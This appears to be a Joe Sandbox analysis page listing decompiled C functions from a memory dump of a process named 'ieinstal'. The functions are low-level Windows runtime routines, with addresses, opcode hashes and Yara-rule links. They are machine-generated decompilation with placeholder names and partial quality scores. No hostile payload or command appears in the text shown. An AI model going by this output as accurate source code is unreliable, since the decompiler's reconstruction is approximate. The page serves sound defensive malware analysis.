				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x1edfd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E1ED39ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E1ED4B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E1EDD8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E1ED39702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x1edfb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                        0x1ed20055
                        0x1ed2005d
                        0x1ed20062
                        0x1ed2006c
                        0x1ed2006f
                        0x1ed20074
                        0x1ed2007a
                        0x1ed2007a
                        0x1ed20080
                        0x1ed20080
                        0x1ed20087
                        0x1ed2008d
                        0x1ed2008f
                        0x1ed20093
                        0x1ed20095
                        0x1ed2009b
                        0x1ed200f8
                        0x1ed200fb
                        0x1ed200fc
                        0x1ed200ff
                        0x1ed20108
                        0x1ed20108
                        0x1ed200a2
                        0x1ed200a6
                        0x1ed200b3
                        0x1ed200bc
                        0x1ed200c5
                        0x1ed200ca
                        0x1ed6c01e
                        0x00000000
                        0x00000000
                        0x1ed6c02d
                        0x1ed200d5
                        0x1ed200d9
                        0x1ed6c03d
                        0x1ed6c046
                        0x1ed6c046
                        0x1ed200df
                        0x1ed200e2
                        0x1ed200ea
                        0x1ed200ef
                        0x1ed200f2
                        0x1ed200f6
                        0x1ed20111
                        0x1ed20117
                        0x1ed20117
                        0x00000000
                        0x1ed200f6
                        0x1ed200d0
                        0x1ed200d0
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 25b121cf1183b5d8180ed4cd8bad50167f3e1ebf42c3b3e170d73061c5f91178
                        • Instruction ID: e99376d61489d348ef3f5f61a4374b16305d56f2571f9f8e56977dc10d35330c
                        • Opcode Fuzzy Hash: 25b121cf1183b5d8180ed4cd8bad50167f3e1ebf42c3b3e170d73061c5f91178
                        • Instruction Fuzzy Hash: BC31AE31601B45CFD721CB28C940B8AB3E6FF88714F244A6DE49A8BB90DB31E801CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED86C0A, Relevance: .1, Instructions: 79COMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E1ED86C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E1ED27D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1edf7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L1ED24620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E1ED4F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E1ED27D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E1ED49AE0();
						_t23 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                        0x1ed86c0a
                        0x1ed86c0f
                        0x1ed86c10
                        0x1ed86c13
                        0x1ed86c15
                        0x1ed86c19
                        0x1ed86c1c
                        0x1ed86c21
                        0x1ed86c28
                        0x1ed86c3a
                        0x1ed86c2a
                        0x1ed86c33
                        0x1ed86c33
                        0x1ed86c3f
                        0x1ed86c48
                        0x1ed86c4d
                        0x1ed86c60
                        0x1ed86c65
                        0x1ed86c69
                        0x1ed86c73
                        0x1ed86c79
                        0x1ed86c7f
                        0x1ed86c86
                        0x1ed86c90
                        0x1ed86c94
                        0x1ed86ca6
                        0x1ed86cb2
                        0x1ed86cbd
                        0x1ed86cbd
                        0x1ed86cc3
                        0x1ed86cc7
                        0x1ed86ccb
                        0x1ed86cd0
                        0x1ed86cd1
                        0x1ed86ce2
                        0x1ed86ce2
                        0x1ed86c69
                        0x1ed86ced

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0b56a2ba44d9117670555a9e3d35f1d186983cf374e611a63faeb0e7debb7fa
                        • Instruction ID: 0f972c779827fd7090cf15c32cb179d25b2fc44baaa4842393d692181eb3396d
                        • Opcode Fuzzy Hash: a0b56a2ba44d9117670555a9e3d35f1d186983cf374e611a63faeb0e7debb7fa
                        • Instruction Fuzzy Hash: 0621A9B5A00684AFC711CB68D980F6AB7B8FF48714F1002A9F908CBB90D735ED50CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED490AF, Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E1ED490AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E1ED5D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E1ED3E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L1ED24620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E1ED4F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E1ED3A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                        0x1ed490af
                        0x1ed490b8
                        0x1ed490bb
                        0x1ed490bf
                        0x1ed490c2
                        0x1ed490c2
                        0x1ed490c8
                        0x1ed490cb
                        0x1ed490cd
                        0x1ed814d7
                        0x1ed814eb
                        0x1ed814eb
                        0x00000000
                        0x1ed814eb
                        0x1ed814db
                        0x1ed814e6
                        0x00000000
                        0x1ed814f2
                        0x1ed814e8
                        0x00000000
                        0x1ed814e8
                        0x1ed490d8
                        0x1ed490da
                        0x1ed490dd
                        0x1ed490e5
                        0x00000000
                        0x1ed49139
                        0x1ed490fa
                        0x1ed490fe
                        0x1ed49142
                        0x00000000
                        0x1ed49142
                        0x1ed49104
                        0x1ed49107
                        0x1ed4910b
                        0x1ed49110
                        0x1ed49118
                        0x1ed49147
                        0x1ed49148
                        0x1ed4914f
                        0x1ed49150
                        0x1ed49151
                        0x1ed49152
                        0x1ed49156
                        0x1ed4915d
                        0x1ed49160
                        0x1ed49168
                        0x1ed4916c
                        0x1ed491bc
                        0x1ed491be
                        0x00000000
                        0x1ed491be
                        0x1ed4916e
                        0x1ed49173
                        0x1ed49176
                        0x00000000
                        0x00000000
                        0x1ed4917c
                        0x1ed49180
                        0x1ed491b5
                        0x00000000
                        0x1ed491b5
                        0x1ed49182
                        0x1ed49185
                        0x1ed49189
                        0x00000000
                        0x00000000
                        0x1ed4918e
                        0x1ed49190
                        0x1ed49198
                        0x00000000
                        0x00000000
                        0x1ed491a0
                        0x00000000
                        0x1ed491ad
                        0x1ed491ad
                        0x1ed491b0
                        0x1ed491b1
                        0x00000000
                        0x1ed49185
                        0x1ed4911a
                        0x1ed4911c
                        0x1ed4911f
                        0x1ed49125
                        0x1ed49127
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction ID: 71c45f9b073fd7b188e2904a4a64d5e5a489e8b826263f51a3a39265a67bee61
                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction Fuzzy Hash: F32195B5A00746EFD720CF5AC444E9AF7F8EF54310F258A6AE985A7690D330ED44CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED33B7A, Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        C-Code - Quality: 59%
                        			E1ED33B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x1edf84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x1edf84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x1edf84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E1ED4AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E1ED4FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x1edf84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x1edf84c4; // 0x0
					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                        0x1ed33b89
                        0x1ed33b96
                        0x1ed33ba1
                        0x1ed33bab
                        0x1ed33bb5
                        0x1ed33bb9
                        0x1ed76298
                        0x1ed33bbf
                        0x1ed33bc2
                        0x1ed33bc3
                        0x1ed33bc9
                        0x1ed33bca
                        0x1ed33bcc
                        0x1ed33bcd
                        0x1ed33bd4
                        0x1ed33bd6
                        0x1ed33bdb
                        0x1ed33bea
                        0x1ed33bf7
                        0x1ed33bfb
                        0x1ed33bff
                        0x1ed33c09
                        0x1ed33c0a
                        0x1ed33c0b
                        0x1ed33c0f
                        0x1ed33c14
                        0x1ed33c18
                        0x1ed33c18
                        0x1ed33bfb
                        0x1ed33c1b
                        0x1ed33c30
                        0x1ed33c30
                        0x1ed33c3d

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 04f28b58764c34f02c721049c0fbd9c7bf72a88d2f95260318d66451e11ee025
                        • Instruction ID: afea5f68c24b92faa3fbe6374beb330750525407735de46f35327d7fbc83f173
                        • Opcode Fuzzy Hash: 04f28b58764c34f02c721049c0fbd9c7bf72a88d2f95260318d66451e11ee025
                        • Instruction Fuzzy Hash: B22192B2A00114AFDB04CF58CE92B5AB7BDFF44708F250678E905AB251D771ED02CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED86CF0, Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E1ED86CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E1ED27D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E1ED27D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1ece5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E1ED3F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E1ED3F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E1ED87016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L1ED22400( &_v52);
								}
								_t21 = L1ED22400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                        0x1ed86cfb
                        0x1ed86d00
                        0x1ed86d02
                        0x1ed86d06
                        0x1ed86d0a
                        0x1ed86d0e
                        0x1ed86d19
                        0x1ed86d2b
                        0x1ed86d1b
                        0x1ed86d24
                        0x1ed86d24
                        0x1ed86d33
                        0x1ed86d39
                        0x1ed86d46
                        0x1ed86d4f
                        0x1ed86d61
                        0x1ed86d51
                        0x1ed86d5a
                        0x1ed86d5a
                        0x1ed86d69
                        0x1ed86d6b
                        0x1ed86d6d
                        0x1ed86d6f
                        0x1ed86d6f
                        0x1ed86d74
                        0x1ed86d79
                        0x1ed86d7a
                        0x1ed86d7f
                        0x1ed86d82
                        0x1ed86d88
                        0x1ed86d89
                        0x1ed86d90
                        0x1ed86d94
                        0x1ed86da7
                        0x1ed86db1
                        0x1ed86db1
                        0x1ed86dbb
                        0x1ed86dbb
                        0x1ed86d90
                        0x1ed86d69
                        0x1ed86d46
                        0x1ed86dc6

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ee100925d7b8552d17dd49a5231b5d4a63c0373f31c0c8967ba1f24bf71bce6
                        • Instruction ID: f575715fce160602704ba35a480441aa347a72f38b5ca5cec6a19400e2e581c0
                        • Opcode Fuzzy Hash: 6ee100925d7b8552d17dd49a5231b5d4a63c0373f31c0c8967ba1f24bf71bce6
                        • Instruction Fuzzy Hash: D9212272800385AFC301CF65C950F9BB7EDAF81760F010A66F990C72A0E734EA09C7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD070D, Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E1EDD070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E1EDD07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E1EDCAFDE( &_v8,  &_v12);
					E1EDD1293(_t38, _v28, _t60);
					if(E1ED27D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E1EDC14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                        0x1edd071b
                        0x1edd0724
                        0x1edd0734
                        0x1edd0738
                        0x1edd074b
                        0x1edd074b
                        0x1edd0753
                        0x1edd0753
                        0x1edd0759
                        0x1edd075d
                        0x1edd0774
                        0x1edd0779
                        0x1edd077d
                        0x1edd0789
                        0x1edd0795
                        0x1edd07a7
                        0x1edd0797
                        0x1edd07a0
                        0x1edd07a0
                        0x1edd07af
                        0x1edd07c4
                        0x1edd07cd
                        0x1edd07cd
                        0x1edd07af
                        0x1edd07dc

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction ID: 214df6ab1df4ad0a3dd59296d48c8b0909b3d8187d6059a8bd3f18ffb34f8baa
                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction Fuzzy Hash: 7721B336604344AFD705CF28C890B6A7BA6FBC4790F048669F9959B3C5D730E909CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED2AE73, Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E1ED2AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E1ED27D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E1ED27D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E1ED27D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E1ED27D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E1ED87794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                        0x1ed2ae78
                        0x1ed2ae7c
                        0x1ed2ae7e
                        0x1ed2ae81
                        0x1ed2ae86
                        0x1ed2ae8d
                        0x1ed72691
                        0x1ed2ae93
                        0x1ed2ae93
                        0x1ed2ae93
                        0x1ed2ae98
                        0x1ed2ae9d
                        0x1ed726a2
                        0x1ed726b4
                        0x1ed726a4
                        0x1ed726ad
                        0x1ed726ad
                        0x1ed726b9
                        0x00000000
                        0x1ed726bb
                        0x00000000
                        0x1ed726bb
                        0x1ed2aea3
                        0x1ed2aea3
                        0x1ed2aea3
                        0x1ed2aeaa
                        0x1ed726c0
                        0x1ed726c9
                        0x1ed726c9
                        0x1ed2aeb3
                        0x1ed726d4
                        0x1ed726e1
                        0x00000000
                        0x00000000
                        0x1ed726e7
                        0x1ed726ee
                        0x1ed726f0
                        0x1ed726f9
                        0x1ed726f9
                        0x1ed72702
                        0x1ed72708
                        0x1ed72708
                        0x1ed7270b
                        0x1ed7270f
                        0x1ed72711
                        0x1ed72711
                        0x1ed72725
                        0x1ed72725
                        0x00000000
                        0x1ed2aeb9
                        0x1ed2aeb9
                        0x1ed2aebf
                        0x1ed2aebf
                        0x1ed2aeb3

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction ID: 965c37bcf574608dd26f859e4c3dc8d64e624f2390656e9568e49491b1cc7db7
                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction Fuzzy Hash: B52101B1A056C2CFD7128B25C944B1937EAFF40B48F5A06B2DC048B6A2E778EC41C7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED87794, Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E1ED87794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1edf7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E1ED4F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E1ED27D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E1ED49AE0();
					_t24 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                        0x1ed87799
                        0x1ed8779a
                        0x1ed8779b
                        0x1ed877a3
                        0x1ed877ab
                        0x1ed877ae
                        0x1ed877b1
                        0x1ed877b1
                        0x1ed877bf
                        0x1ed877c4
                        0x1ed877c8
                        0x1ed877ce
                        0x1ed877d4
                        0x1ed877e0
                        0x1ed877e0
                        0x1ed877d6
                        0x1ed877d6
                        0x1ed877de
                        0x00000000
                        0x00000000
                        0x1ed877de
                        0x1ed877e5
